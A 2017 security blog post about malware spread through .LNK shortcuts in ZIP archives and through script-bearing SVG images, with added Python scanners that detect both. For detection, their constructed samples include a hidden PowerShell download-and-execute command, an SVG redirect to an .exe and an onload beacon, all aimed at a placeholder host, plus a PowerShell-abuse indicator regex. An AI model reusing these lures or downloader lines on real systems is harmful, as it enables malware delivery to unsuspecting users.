Posted Feb. 7, 2017, 12:12 p.m.

Malware File Types Changing to Look less Suspect

Following on from our previous post about the State of Malware report from Malwarebytes last week, the Microsoft Malware Protection Center has issued a new warning: malware distributors are now using less suspicious, widely recognised file types to make their emails look more genuine, and so convince more users to open the attachments.

PDF, Word, Excel and even PowerPoint files are all common carriers of malware, and anyone receiving an email that looks suspicious should be very cautious about opening any website links or attached files until they are sure the sender is genuine. The latest wave of spam emails has switched things up a notch: it uses .LNK (Windows shortcut) files placed inside ZIP archives to get users to open them. Once opened, the .LNK file runs a malicious PowerShell command which, in the campaign Microsoft describes, downloads and installs the Kovter click-fraud Trojan on the user's computer.
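As an added example (not code from the original post or from Microsoft's report), the following Python script opens a ZIP attachment in memory, parses the Shell Link header and StringData of every .LNK entry using the layout from Microsoft's public MS-SHLLINK specification, and flags shortcuts whose target or arguments invoke PowerShell. The archive contents, the entry names, the example.invalid URL and the indicator list are all constructed for this example; the `build_lnk` helper fabricates minimal synthetic shortcuts so the script runs offline, and `parse_lnk` works on real shortcut files too.

```python
import io
import re
import struct
import zipfile

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional parts follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields, in the fixed order they appear when their flag is set.
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
FLAG_OF = {key: flag for flag, key in STRING_FIELDS}
# Indicators of PowerShell abuse (constructed list; tune it for your environment).
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc(odedcommand)?\b|-e\b|-w(indowstyle)?\s+hidden|bypass|"
    r"\biex\b|invoke-expression|downloadstring|downloadfile|webclient", re.IGNORECASE)


def string_data(s):
    """CountCharacters (2 bytes) followed by the UTF-16LE string, no terminator."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path, arguments, working_dir=None):
    """Build a minimal synthetic .LNK (constructed sample, not a real artefact).
    Timestamps and attributes stay zero; only the fields parse_lnk() reads are set."""
    fields = {"relative_path": relative_path, "arguments": arguments}
    if working_dir is not None:
        fields["working_dir"] = working_dir
    flags = IS_UNICODE
    for key in fields:
        flags |= FLAG_OF[key]
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID
    header += struct.pack("<II", flags, 0)              # LinkFlags, FileAttributes
    header += b"\x00" * 24                              # Creation/Access/Write times
    # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL), HotKey, Reserved1..3
    header += struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0)
    body = b"".join(string_data(fields[k]) for _, k in STRING_FIELDS if k in fields)
    return header + body


def parse_lnk(data):
    """Return LinkFlags and StringData of a Shell Link as a dict.
    Raises ValueError (bad magic) or struct.error (truncated) on malformed input."""
    if data[:4] != struct.pack("<I", HEADER_SIZE) or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:     # IDListSize excludes the size field
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:               # LinkInfoSize includes the size field
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & IS_UNICODE)
    link = {"flags": flags}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if is_unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise struct.error("truncated StringData")
        link[key] = raw.decode("utf-16-le" if is_unicode else "cp1252")
        pos += nbytes
    return link


def scan_zip(zip_bytes):
    """Inspect every .LNK entry of an in-memory ZIP; one dict per shortcut.
    verdict: 'suspicious' when the shortcut invokes PowerShell-style commands,
    'lnk' for any other shortcut (still unusual in e-mail), 'malformed' when an
    entry named .lnk is not a shortcut at all."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".lnk"):
                continue
            try:
                link = parse_lnk(zf.read(info))
            except (ValueError, struct.error) as exc:
                findings.append({"name": info.filename, "verdict": "malformed",
                                 "command": str(exc), "hits": []})
                continue
            cmd = " ".join(link.get(k, "") for k in ("relative_path", "arguments"))
            hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
            findings.append({"name": info.filename, "command": cmd, "hits": hits,
                             "verdict": "suspicious" if hits else "lnk"})
    return findings


def sample_archive():
    """Constructed ZIP: a harmless shortcut, a PowerShell downloader lure, a decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "plain text, ignored by the scanner")
        zf.writestr("Notes.lnk", build_lnk(r"..\..\Windows\notepad.exe", "notes.txt"))
        zf.writestr("Invoice_2017.pdf.lnk", build_lnk(
            r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/x')\"", r"%TEMP%"))
        zf.writestr("Decoy.lnk", b"not really a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(sample_archive()):
        print(f"{f['verdict']:10} {f['name']}: {f['command']}  hits={f['hits']}")
```

Two points worth keeping in mind when using this on real mail: the double extension in `Invoice_2017.pdf.lnk` is the usual lure, since Explorer hides the `.lnk` suffix and shows a PDF-looking name, so match on the real extension rather than on what the user would see; and the indicator regex is only a starting point, because the shortcut may call `cmd.exe` or `mshta.exe` first, or hide the real command in the LinkTargetIDList or in padding after the StringData, so any .LNK arriving by email deserves a closer look regardless of the verdict.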

.SVG image files are another type increasingly used to spread malware. SVG is an XML format that can embed JavaScript, and a browser runs that script as soon as the image is opened. The script can trigger downloads without the user being aware of anything, because all they see is an image in their browser.
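As an added example (not from the post), a small Python check that treats an SVG attachment as XML and reports the script-bearing constructs a browser would execute when the file is opened: `<script>` elements, `on*` event-handler attributes, `javascript:` links and `<foreignObject>` (which can wrap arbitrary HTML). The three sample files, including the example.invalid URLs, are constructed for this example.

```python
import xml.etree.ElementTree as ET


def local_name(qualified):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_svg(svg_text):
    """Return the reasons an SVG counts as active content; [] means plain image."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if local_name(root.tag) != "svg":
        return [f"root element is <{local_name(root.tag)}>, not <svg>"]
    reasons = []
    for el in root.iter():                       # root.iter() includes the root
        tag = local_name(el.tag)
        if tag == "script":
            reasons.append("<script> element")
        elif tag == "foreignobject":
            reasons.append("<foreignObject> element (can embed arbitrary HTML)")
        for attr, value in el.attrib.items():
            name = local_name(attr)              # handles xlink:href and plain href
            if name.startswith("on"):
                reasons.append(f"{name} event handler on <{tag}>")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                reasons.append(f"javascript: URL on <{tag}>")
    return reasons


# Constructed samples: a lure that looks like a harmless preview but redirects the
# browser to a download, a handler/javascript: variant, and a plain icon.
LURE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="240" height="80">
  <rect width="240" height="80" fill="#eeeeee"/>
  <text x="16" y="48" font-size="20">Invoice preview</text>
  <script type="text/javascript">
    window.location = "http://example.invalid/invoice.exe";
  </script>
</svg>"""
HANDLER_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="fetch('http://example.invalid/beacon')">
  <a xlink:href="javascript:void(0)"><circle r="20" cx="20" cy="20"/></a>
</svg>"""
PLAIN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">
  <circle r="8" cx="8" cy="8" fill="#336699"/>
</svg>"""

if __name__ == "__main__":
    for label, svg in (("lure", LURE_SVG), ("handler", HANDLER_SVG), ("plain", PLAIN_SVG)):
        print(label, scan_svg(svg) or "no active content")
```

The standard-library parser is used here for brevity; a mail gateway parsing untrusted XML should use defusedxml or an equivalent so that entity-expansion tricks cannot exhaust it. Inline script is also only one form of active content: an SVG opened directly in a browser will fetch remote URLs referenced from `<image>` or `<use>`, which is enough for a tracking beacon even without any JavaScript.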

As of February 13th, 2017, Google will block JavaScript (.js) files as Gmail attachments, whether attached directly or inside archives, because JavaScript attachments are one of the most common ways of spreading malware. The announcement was made in late January, and it may mean we see more spam sent with other types of attachment as malicious senders work around the restriction.

As always, caution must be the watchword for any email you receive that isn't from a known sender or source, especially if it carries attachments and/or hyperlinks. LNK files in particular are unfamiliar to most regular internet users, and are not the sort of file anyone would normally send to pass on information, so an attachment like this should definitely be treated as suspect!